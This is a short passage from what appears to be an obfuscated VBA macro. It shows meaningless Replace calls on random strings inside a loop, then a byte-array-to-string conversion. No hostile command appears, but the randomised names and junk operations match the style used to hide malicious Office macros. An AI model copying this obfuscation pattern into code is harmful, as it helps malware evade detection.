        CmHWM = Replace("HUqyzhlKIJ", "HUq", "EbecS")
        CmHWM = Replace("iahoZSlEWE", "iah", "FqFgH")
    Wend
    lwdPKrR = StrConv(FbyM, vbUnicode)
End Function